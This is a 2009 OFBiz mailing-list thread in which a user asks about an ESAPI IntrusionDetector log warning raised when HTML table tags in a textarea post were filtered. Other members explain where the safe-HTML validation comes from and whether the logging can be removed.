Could someone explain this to me?

Previous Topic Next Topic
 
classic Classic list List threaded Threaded
4 messages Options
Reply | Threaded
Open this post in threaded view
|

Could someone explain this to me?

Ruth Hoffman-2
version 803418 (9.04)
Where is this log messaging coming from? What framework or other
component is generating it? And under what types of conditions?

Aug 13, 2009 7:56:49 PM AppNameNotSpecified IntrusionDetector
WARNING: SECURITY-FAILURE Anonymous@unknown:unknown -- Invalid HTML
input: context=body, errors=[The <b>table</b> tag has been filtered for
security reasons. The contents of the tag will remain in place., The
<b>tr</b> tag has been filtered for security reasons. The contents of
the tag will remain in place., The <b>th</b> tag has been filtered for
security reasons. The contents of the tag will remain in place., The
<b>tr... *[THIS PART REMOVED]* ...contents of the tag will remain in
place., The <b>td</b> tag has been filtered for security reasons. The
contents of the tag will remain in place.]
    ValidationException @
org.owasp.esapi.reference.DefaultValidator.getValidSafeHTML(null:-1)

Thanks
Ruth

Reply | Threaded
Open this post in threaded view
|

Re: Could someone explain this to me?

Bob Morley
Hi Ruth,

I believe this is the standard Ofbiz validation of incoming parameters to a service.  It appears this is used when the incoming parameter has been marked as to allow only "safe" html.  The implementation makes use of the DefaultValidator below and can be configured by changing the a xml file.  Here is the comment in the code:

Based on the ESAPI validator configured in the antisamy-esapi.xml file.

So from this I would gauge that you had put something in your screen and then clicked to post that information to the sever.  One of the fields from your form post contains some characters that the validator deemed to not be "safe".  This type of stuff is usually to guard against sql injection and such ... My guess is that you pasted some html into a textarea and tried to do a save?

Ruth Hoffman-2 wrote
version 803418 (9.04)
Where is this log messaging coming from? What framework or other
component is generating it? And under what types of conditions?

Aug 13, 2009 7:56:49 PM AppNameNotSpecified IntrusionDetector
WARNING: SECURITY-FAILURE Anonymous@unknown:unknown -- Invalid HTML
input: context=body, errors=[The table tag has been filtered for
security reasons. The contents of the tag will remain in place., The
tr tag has been filtered for security reasons. The contents of
the tag will remain in place., The th tag has been filtered for
security reasons. The contents of the tag will remain in place., The
tr... *[THIS PART REMOVED]* ...contents of the tag will remain in
place., The td tag has been filtered for security reasons. The
contents of the tag will remain in place.]
    ValidationException @
org.owasp.esapi.reference.DefaultValidator.getValidSafeHTML(null:-1)

Thanks
Ruth
Reply | Threaded
Open this post in threaded view
|

Re: Could someone explain this to me?

Ruth Hoffman-2
Hi Bob:
Thanks for the response. Based on your answer, I'm wondering when OFBiz
started doing this and where in the code/or configuration files I can go
to remove this logging. Could this be part of scrubbing  that is done as
a precursor to using the sendMail service? I'm trying to figure out
where this is happening. I am posting some text from a textarea. And I'm
saving that and then formatting and sending an email with some of that
content.

Thanks again.
Ruth
Bob Morley wrote:

> Hi Ruth,
>
> I believe this is the standard Ofbiz validation of incoming parameters to a
> service.  It appears this is used when the incoming parameter has been
> marked as to allow only "safe" html.  The implementation makes use of the
> DefaultValidator below and can be configured by changing the a xml file.
> Here is the comment in the code:
>
> Based on the ESAPI validator configured in the antisamy-esapi.xml file.
>
> So from this I would gauge that you had put something in your screen and
> then clicked to post that information to the sever.  One of the fields from
> your form post contains some characters that the validator deemed to not be
> "safe".  This type of stuff is usually to guard against sql injection and
> such ... My guess is that you pasted some html into a textarea and tried to
> do a save?
>
>
> Ruth Hoffman-2 wrote:
>  
>> version 803418 (9.04)
>> Where is this log messaging coming from? What framework or other
>> component is generating it? And under what types of conditions?
>>
>> Aug 13, 2009 7:56:49 PM AppNameNotSpecified IntrusionDetector
>> WARNING: SECURITY-FAILURE Anonymous@unknown:unknown -- Invalid HTML
>> input: context=body, errors=[The table tag has been filtered for
>> security reasons. The contents of the tag will remain in place., The
>> tr tag has been filtered for security reasons. The contents of
>> the tag will remain in place., The th tag has been filtered for
>> security reasons. The contents of the tag will remain in place., The
>> tr... *[THIS PART REMOVED]* ...contents of the tag will remain in
>> place., The td tag has been filtered for security reasons. The
>> contents of the tag will remain in place.]
>>     ValidationException @
>> org.owasp.esapi.reference.DefaultValidator.getValidSafeHTML(null:-1)
>>
>> Thanks
>> Ruth
>>
>>
>>
>>    
>
>  

Reply | Threaded
Open this post in threaded view
|

Re: Could someone explain this to me?

Jacques Le Roux
Administrator
From: "Ruth Hoffman" <[hidden email]>
> Hi Bob:
> Thanks for the response. Based on your answer, I'm wondering when OFBiz started doing this

This effort began around november 2008 and "ended" (not totally complete, say 98%, see
https://issues.apache.org/jira/browse/OFBIZ-1525 for instance) around Mars 2009

>and where in the code/or configuration files I can go to remove this logging.

I'm afraid there is nothing in OFBiz currently in OFBiz to remove this kind of loggin. It may be doable and is a part of Esapi
(http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API)


>Could this be part of scrubbing  that is done as a precursor to using the sendMail service?

Not it's not specifically related to that.

Jacques

>I'm trying to figure out where this is happening. I am posting some text from a textarea. And I'm saving that and then formatting
>and sending an email with some of that content.
>
> Thanks again.
> Ruth
> Bob Morley wrote:
>> Hi Ruth,
>>
>> I believe this is the standard Ofbiz validation of incoming parameters to a
>> service.  It appears this is used when the incoming parameter has been
>> marked as to allow only "safe" html.  The implementation makes use of the
>> DefaultValidator below and can be configured by changing the a xml file. Here is the comment in the code:
>>
>> Based on the ESAPI validator configured in the antisamy-esapi.xml file.
>>
>> So from this I would gauge that you had put something in your screen and
>> then clicked to post that information to the sever.  One of the fields from
>> your form post contains some characters that the validator deemed to not be
>> "safe".  This type of stuff is usually to guard against sql injection and
>> such ... My guess is that you pasted some html into a textarea and tried to
>> do a save?
>>
>>
>> Ruth Hoffman-2 wrote:
>>
>>> version 803418 (9.04)
>>> Where is this log messaging coming from? What framework or other component is generating it? And under what types of conditions?
>>>
>>> Aug 13, 2009 7:56:49 PM AppNameNotSpecified IntrusionDetector
>>> WARNING: SECURITY-FAILURE Anonymous@unknown:unknown -- Invalid HTML input: context=body, errors=[The table tag has been filtered
>>> for security reasons. The contents of the tag will remain in place., The tr tag has been filtered for security reasons. The
>>> contents of the tag will remain in place., The th tag has been filtered for security reasons. The contents of the tag will
>>> remain in place., The tr... *[THIS PART REMOVED]* ...contents of the tag will remain in place., The td tag has been filtered for
>>> security reasons. The contents of the tag will remain in place.]
>>>     ValidationException @ org.owasp.esapi.reference.DefaultValidator.getValidSafeHTML(null:-1)
>>>
>>> Thanks
>>> Ruth
>>>
>>>
>>>
>>>
>>
>>
>